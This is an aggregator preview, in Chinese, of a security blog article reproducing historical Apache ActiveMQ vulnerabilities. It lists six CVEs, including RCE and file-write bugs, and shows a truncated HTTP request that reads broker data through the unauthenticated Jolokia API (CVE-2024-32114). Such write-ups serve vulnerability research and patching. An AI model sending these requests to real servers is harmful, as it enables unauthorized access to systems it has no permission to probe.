专栏名称: Timeline Sec
安全圈必备公众号之一!专注于最新漏洞复现!内含漏洞时间线工具靶场等干货!记录每一个漏洞,捕捉安全的每一瞬间!
今天看啥  ›  专栏  ›  Timeline Sec

Apache ActiveMQ历史漏洞复现合集

Timeline Sec  · 公众号  ·  · 2024-09-29 18:00
    

文章预览

关注我们❤️,添加星标🌟,一起学安全! 作者:Timeline Sec漏洞研究组 本文字数:8902 阅读时长:5-6mins 声明:仅供学习参考使用,请勿用作违法用途,否则后果自负 序号 漏洞编号 漏洞类型 作者 1 CVE-2024-32114 未授权 hexixi 2 CVE-2023-46604 RCE hexixi 3 CVE-2022-41678 RCE hexixi 4 CVE-2017-15709 信息泄漏 hexixi 5 CVE-2016-3088 任意文件写入 hexixi 6 CVE-2015-5254 反序列化 hexixi 注:后台回复“ 技术手册 ”可获取合集PDF文档 Apache ActiveMQ Jolokia REST API 未授权访问漏洞(CVE-2024-32114) 0x01 利用条件 权限要求:无需权限 其他条件:允许远程访问 0x02 影响版本 6.0.0 < = Apache ActiveMQ < 6.1.2 0x03 漏洞复现 访问/api/jolokia可看到相关信息 获取AactiveMQ代理消息 GET /api/jolokia/ read /org.apache.activemq: type =Broker,brokerName=localhost HTTP/1.1 Host: 192.168.187.129:8161 Pragma: no-cache Cache-Control: no-cache Upgrade-Insecu ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览